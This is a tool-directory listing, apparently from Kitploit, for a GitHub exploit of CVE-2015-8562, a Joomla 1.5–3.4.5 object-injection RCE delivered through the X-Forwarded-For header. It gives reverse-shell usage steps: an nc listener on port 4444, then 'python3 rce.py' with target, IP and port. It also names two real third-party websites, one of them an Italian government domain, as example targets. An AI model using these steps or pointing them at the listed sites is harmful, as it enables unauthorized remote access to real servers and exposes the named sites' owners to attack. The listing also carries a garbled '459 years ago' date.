Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/dmonst3r/cve-2015-8562
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubdmonst3r/cve-2015-8562

CVE-2015-8562

Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For header

View Repository
459 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2015-8562 - Reverse shell python

Exploit: Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For header:

root@kitploit:~
Vuln Date: 12/17/2015
Exploit Author: anarc0der
Version: Joomla 1.5 to 3.4.5
CVE : CVE-2015-8562

How to:

root@kitploit:~
Open one terminal and listen with nc: $ nc -lnvp 4444
Open another terminal and execute the exploit:
python3 rce.py --target='target' --ip='ip' --port=4444

Targets examples PoC (Do not fuck them, to other people use as exemple):

root@kitploit:~
http://www.monitoraggiograduatorie.gov.it/
http://budo-aykac.nl/
Download Tool